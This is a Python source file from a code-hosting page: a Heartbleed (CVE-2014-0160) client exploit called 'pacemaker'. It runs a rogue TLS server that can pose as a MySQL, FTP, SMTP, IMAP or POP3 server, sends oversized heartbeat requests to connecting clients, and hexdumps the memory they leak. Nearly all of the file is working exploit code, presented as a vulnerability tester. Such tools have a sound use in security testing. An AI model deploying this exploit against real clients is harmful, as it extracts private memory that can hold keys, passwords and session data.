Permalink
Switch branches/tags
Nothing to show
Find file Copy path
a49dca2 Jan 20, 2016
2 contributors

Users who have contributed to this file

@Lekensteyn @jwilk
executable file 451 lines (380 sloc) 16.7 KB
#!/usr/bin/env python
# Exploitation of CVE-2014-0160 Heartbeat for the client
# Author: Peter Wu <peter@lekensteyn.nl>
# Licensed under the MIT license <http://opensource.org/licenses/MIT>.
# Python 2.6 compatibility
from __future__ import unicode_literals
try:
import socketserver
except:
import SocketServer as socketserver
import socket
import sys
import struct
import select, time
from argparse import ArgumentParser, ArgumentTypeError
# OpenSSL 1.0.1f buffer size is 4096 (DEFAULT_BUFFER_SIZE), data is flushed in
# buffer_write iff the size of the TLSPlaintext ("fragment") exceeds that
# buffer. So, to reliably get a heartbeat back, the payload length must be at
# least 4097 ("over 4096") - 5 (content type, TLS version, record length) - 3
# (HB type, payload length) - 16 (added padding). Also note that the maximum
# TLSPlaintext length is 0x4000 (SSL3_RT_MAX_PLAIN_LENGTH, enforced via
# max_send_fragment in ssl3_write_bytes).
#
# The returned heartbeat fragment has length 3 + payload length + 16 (type,
# payload length, payload, padding).
MAX_PLAIN_LENGTH = 0x4000
def payload_len(string):
# Minimum OpenSSL buffer fill size for the fragment (excl. record "header")
pl_min = 4097 - 5
# Drop type (1) + payload length (2) + padding (16) = 19
pl_max = 0xffed
payload_len = int(string, 0) # Accept decimal (e.g. 18) and hex (e.g. 0x12)
if payload_len > pl_max:
raise ArgumentTypeError('Payload length must be at most {0} ({0:#x})'
.format(pl_max))
if payload_len < pl_min:
raise ArgumentTypeError('Payload length must be at least {0} ({0:#x})'
.format(pl_min))
# Size of total response incl. hb type, payload len and padding
response_len = 3 + payload_len + 16
# Each response block must be at be the buffer size
if 0 < response_len % MAX_PLAIN_LENGTH < pl_min:
safe_payload_len = MAX_PLAIN_LENGTH * (response_len // MAX_PLAIN_LENGTH)
safe_payload_len += pl_min - 3 - 16
print(('Warning: payload length {0} ({0:#x}) will cause delays, ' +
'try at least {1} ({1:#x})').format(payload_len, safe_payload_len))
return payload_len
parser = ArgumentParser(description='Test clients for Heartbleed (CVE-2014-0160)')
parser.add_argument('-6', '--ipv6', action='store_true',
help='Enable IPv6 addresses (implied by IPv6 listen addr. such as ::)')
parser.add_argument('-l', '--listen', default='',
help='Host to listen on (default "%(default)s")')
parser.add_argument('-p', '--port', type=int, default=4433,
help='TCP port to listen on (default %(default)d)')
# Note: FTP is (Explicit FTPS). Use TLS for Implicit FTPS
parser.add_argument('-c', '--client', default='tls',
choices=['tls', 'mysql', 'ftp', 'smtp', 'imap', 'pop3'],
help='Target client type (default %(default)s)')
parser.add_argument('-t', '--timeout', type=int, default=3,
help='Timeout in seconds to wait for a Heartbeat (default %(default)d)')
parser.add_argument('--skip-server', default=False, action='store_true',
help='Skip ServerHello, immediately write Heartbeat request')
parser.add_argument('-x', '--count', type=int, default=1,
help='Number of Heartbeats requests to be sent (default %(default)d)')
parser.add_argument('-n', '--payload-length', type=payload_len, default=0xffed,
dest='payload_len',
help='Requested payload length including 19 bytes heartbeat type, ' +
'payload length and padding (default %(default)#x bytes)')
def make_hello(sslver, cipher):
# Record
data = '16 ' + sslver
data += ' 00 31' # Record length
# Handshake
data += ' 02 00'
data += ' 00 2d' # Handshake length
data += ' ' + sslver
data += '''
52 34 c6 6d 86 8d e8 40 97 da
ee 7e 21 c4 1d 2e 9f e9 60 5f 05 b0 ce af 7e b7
95 8c 33 42 3f d5 00
'''
data += ' '.join('{0:02x}'.format(c) for c in cipher)
data += ' 00' # No compression
data += ' 00 05' # Extensions length
# Heartbeat extension
data += ' 00 0f' # Heartbeat type
data += ' 00 01' # Length
data += ' 01' # mode
return bytearray.fromhex(data.replace('\n', ''))
def make_heartbeat(sslver, payload_len=0xffed):
data = '18 ' + sslver
data += ' 00 03' # Length
data += ' 01' # Type: Request
# OpenSSL responds with records of length 0x4000. It starts with 3 bytes
# (length, response type) and ends with a 16 byte padding. If the payload is
# too small, OpenSSL buffers it and this will cause issues with repeated
# heartbeat requests. Therefore request a payload that fits exactly in four
# records (0x4000 * 4 - 3 - 16 = 0xffed).
data += ' {0:02x} {1:02x}'.format(payload_len >> 8, payload_len & 0xFF)
return bytearray.fromhex(data.replace('\n', ''))
def hexdump(data):
allzeroes = b'\0' * 16
zerolines = 0
for i in range(0, len(data), 16):
line = data[i:i+16]
if line == allzeroes[:len(line)]:
zerolines += 1
if zerolines == 2:
print("*")
if zerolines >= 2:
continue
print("{0:04x}: {1:47} {2}".format(i,
' '.join('{0:02x}'.format(c) for c in line),
''.join(chr(c) if c >= 32 and c < 127 else '.' for c in line)))
class Failure(Exception):
pass
class RecordParser(object):
record_s = struct.Struct(b'!BHH')
def __init__(self):
self.buffer = bytearray()
self.buffer_len = 0
self.record_hdr = None
def feed(self, data):
self.buffer += data
self.buffer_len += len(data)
def get_header(self):
if self.record_hdr is None and self.buffer_len >= self.record_s.size:
self.record_hdr = self.record_s.unpack_from(bytes(self.buffer))
return self.record_hdr
def bytes_needed(self):
'''Zero or lower indicates that a fragment is available'''
expected_len = self.record_s.size
if self.get_header():
expected_len += self.record_hdr[2]
return expected_len - self.buffer_len
def get_record(self, partial=False):
if not self.get_header():
return None
record_type, sslver, fragment_len = self.record_hdr
record_len = self.record_s.size + fragment_len
if not partial and self.buffer_len < record_len:
return None
fragment = self.buffer[self.record_s.size:record_len]
del self.buffer[:record_len]
self.buffer_len -= record_len
self.record_hdr = None
return record_type, sslver, bytes(fragment)
def read_record(sock, timeout, partial=False):
rparser = RecordParser()
end_time = time.time() + timeout
error = None
bytes_to_read = rparser.bytes_needed()
while bytes_to_read > 0 and timeout > 0:
rl, _, _ = select.select([sock], [], [], timeout)
if not rl:
error = socket.timeout('Timeout while waiting for bytes')
break
try:
rparser.feed(rl[0].recv(bytes_to_read))
except socket.error as e:
error = e
break # Connection reset?
bytes_to_read = rparser.bytes_needed()
timeout = end_time - time.time()
return rparser.get_record(partial=partial), error
def read_hb_response(sock, timeout):
end_time = time.time() + timeout
memory = bytearray()
hb_len = 1 # Will be initialized after first heartbeat
read_error = None
alert = None
while len(memory) < hb_len and timeout > 0:
record, read_error = read_record(sock, timeout, partial=True)
if not record:
break
record_type, _, fragment = record
if record_type == 24:
if not memory: # First Heartbeat
# Check for enough room for type + len
if len(fragment) < 3:
if read_error: # Ignore error due to partial read
break
raise Failure('Response too small')
# Sanity check, should not happen with OpenSSL
if fragment[0:1] != b'\2':
raise Failure('Expected Heartbeat in first response')
hb_len, = struct.unpack_from(b'!H', fragment, 1)
memory += fragment[3:]
else: # Heartbeat continuation
memory += fragment
elif record_type == 21 and len(fragment) == 2: # Alert
alert = fragment
break
else:
# Cannot tell whether vulnerable or not!
raise Failure('Unexpected record type {0}'.format(record_type))
timeout = end_time - time.time()
# Drop heartbeat padding that is included in buffer
if len(memory) - 16 == hb_len:
del memory[hb_len:]
# Check for Alert (sent by NSS)
if alert:
lvl, desc = alert[0:1], ord(alert[1:2])
lvl = 'Warning' if lvl == 1 else 'Fatal'
print('Got Alert, level={0}, description={1}'.format(lvl, desc))
if not memory:
print('Not vulnerable! (Heartbeats disabled or not OpenSSL)')
return None
# Do not print error if we have memory, server could be crashed, etc.
if read_error and not memory:
print('Did not receive heartbeat response! ' + str(read_error))
return memory
class RequestHandler(socketserver.BaseRequestHandler):
def handle(self):
self.args = self.server.args
self.sslver = '03 01' # default to TLSv1.0
remote_addr, remote_port = self.request.getpeername()[:2]
print("Connection from: {0}:{1}".format(remote_addr, remote_port))
try:
# Set timeout to prevent hang on clients that send nothing
self.request.settimeout(2)
prep_meth = 'prepare_' + self.args.client
if hasattr(self, prep_meth):
getattr(self, prep_meth)(self.request)
print('Pre-TLS stage completed, continuing with handshake')
if not self.args.skip_server:
self.do_serverhello()
for i in range(0, self.args.count):
try:
if not self.do_evil():
break
except socket.error as e:
if i == 0: # First heartbeat?
print('Unable to send first heartbeat! ' + str(e))
else:
print('Unable to send more heartbeats, ' + str(e))
break
except (Failure, socket.error, socket.timeout) as e:
print('Unable to check for vulnerability: ' + str(e))
except KeyboardInterrupt:
# Don't just abort this client, stop the server too
print('Shutting down...')
self.server.kill()
print('')
def do_serverhello(self):
# Read TLS record header
content_type, ver, rec_len = self.recv_s(b'>BHH', 'TLS record')
# Session-ID length (1 byte) starts at offset 38
self.expect(rec_len >= 39, 'Illegal handshake packet')
if content_type == 0x80: # SSLv2 (assume length < 256)
raise Failure('SSL 2.0 clients cannot be tested')
else:
self.expect(content_type == 22, 'Expected Handshake type')
# Read handshake
hnd = self.request.recv(rec_len)
self.expect(len(hnd) == rec_len, 'Unable to read handshake')
hnd_type, len_high, len_low, ver = struct.unpack(b'>BBHH', hnd[:6])
self.expect(hnd_type == 1, 'Expected Client Hello')
# hnd[6:6+32] is Random
off = 6 + 32
sid_len, = struct.unpack(b'B', hnd[off:off+1])
off += 1 + sid_len # Skip length and SID
# Enough room for ciphers?
self.expect(rec_len - off >= 4, 'Illegal handshake packet (2)')
ciphers_len = struct.unpack(b'<H', hnd[off:off+2])
off += 2
# The first cipher is fine...
cipher = bytearray(hnd[off:off+2])
self.sslver = '{0:02x} {1:02x}'.format(ver >> 8, ver & 0xFF)
# (1) Handshake: ServerHello
self.request.sendall(make_hello(self.sslver, cipher))
# (skip Certificate, etc.)
def do_evil(self):
'''Returns True if memory *may* be acquired'''
# (2) HeartbeatRequest
self.request.sendall(make_heartbeat(self.sslver, self.args.payload_len))
# (3) Buggy OpenSSL will throw 0xffff bytes, fixed ones stay silent
memory = read_hb_response(self.request, self.args.timeout)
# If memory is None, then it is not vulnerable for sure. Otherwise, if
# empty, then it *may* be invulnerable
if memory is not None and not memory:
print("Possibly not vulnerable")
return False
elif memory:
print('Client returned {0} ({0:#x}) bytes'.format(len(memory)))
hexdump(memory)
return True
def expect(self, cond, what):
if not cond:
raise Failure(what)
def prepare_mysql(self, sock):
# This was taken from a MariaDB client. For reference, see
# https://dev.mysql.com/doc/internals/en/connection-phase-packets.html#packet-Protocol::Handshake
greeting = u'''
56 00 00 00 0a 35 2e 35 2e 33 36 2d 4d 61 72 69
61 44 42 2d 6c 6f 67 00 04 00 00 00 3d 3b 4e 57
4c 54 44 35 00 ff ff 21 02 00 0f e0 15 00 00 00
00 00 00 00 00 00 00 7c 36 33 3f 23 2e 5e 6d 2d
34 5c 54 00 6d 79 73 71 6c 5f 6e 61 74 69 76 65
5f 70 61 73 73 77 6f 72 64 00
'''
sock.sendall(bytearray.fromhex(greeting.replace('\n', '')))
print("Server Greeting sent.")
len_low, len_high, seqid, caps = self.recv_s(b'<BHBH', 'MySQL handshake')
packet_len = (len_high << 8) | len_low
self.expect(packet_len == 32, 'Expected SSLRequest length == 32')
self.expect((caps & 0x800), 'Missing Client SSL support')
print("Skipping {0} packet bytes...".format(packet_len))
# Skip remainder (minus 2 for caps) to prepare for SSL handshake
sock.recv(packet_len - 2)
def prepare_ftp(self, sock):
sock.sendall('220 pacemaker test\r\n'.encode('ascii'))
data = sock.recv(16).decode('ascii').strip()
self.expect(data in ('AUTH SSL', 'AUTH TLS'), \
'Unexpected response: ' + data)
sock.sendall(bytearray('234 ' + data + '\r\n', 'ascii'))
def prepare_pop3(self, sock):
self.do_conversation('+OK pacemaker ready\r\n', [
('CAPA', '+OK\r\nSTLS\r\n.\r\n'),
('STLS', '+OK\r\n')
])
def prepare_smtp(self, sock):
self.do_conversation('220 pacemaker test\r\n', [
('EHLO ', '250-example.com Hi!\r\n250 STARTTLS\r\n'),
('STARTTLS', '220 Go ahead\r\n')
])
def prepare_imap(self, sock):
caps = 'CAPABILITY IMAP4rev1 STARTTLS'
talk = [
('CAPABILITY', '* ' + caps + '\r\n'),
('STARTTLS', '')
]
sock.sendall(('* OK [' + caps + '] ready\r\n').encode('ascii'))
for exp, resp in talk:
data = sock.recv(256).decode('ascii').upper()
self.expect(' ' in data, 'IMAP protocol violation, got ' + data)
tag, data = data.split(' ', 2)
self.expect(data[:len(exp)] == exp, \
'Expected ' + exp + ', got ' + data)
resp += tag + ' OK\r\n'
sock.sendall(resp.encode('ascii'))
def do_conversation(self, greeting, talk):
'''Helper to handle simple request-response protocols.'''
self.request.sendall(greeting.encode('ascii'))
for exp, resp in talk:
data = self.request.recv(256).decode('ascii').upper()
self.expect(data[:len(exp)] == exp, \
'Expected ' + exp + ', got ' + data)
self.request.sendall(resp.encode('ascii'))
def recv_s(self, struct_def, what):
s = struct.Struct(struct_def)
data = self.request.recv(s.size)
msg = '{0}: received only {1}/{2} bytes'.format(what, len(data), s.size)
self.expect(len(data) == s.size, msg)
return s.unpack(data)
class PacemakerServer(socketserver.TCPServer):
def __init__(self, args):
server_address = (args.listen, args.port)
self.allow_reuse_address = True
if args.ipv6 or ':' in args.listen:
self.address_family = socket.AF_INET6
socketserver.TCPServer.__init__(self, server_address, RequestHandler)
self.args = args
def serve_forever(self):
self.stopped = False
while not self.stopped:
self.handle_request()
def kill(self):
self.stopped = True
def serve(args):
print('Listening on {0}:{1} for {2} clients'
.format(args.listen, args.port, args.client))
server = PacemakerServer(args)
server.serve_forever()
if __name__ == '__main__':
args = parser.parse_args()
try:
serve(args)
except KeyboardInterrupt:
pass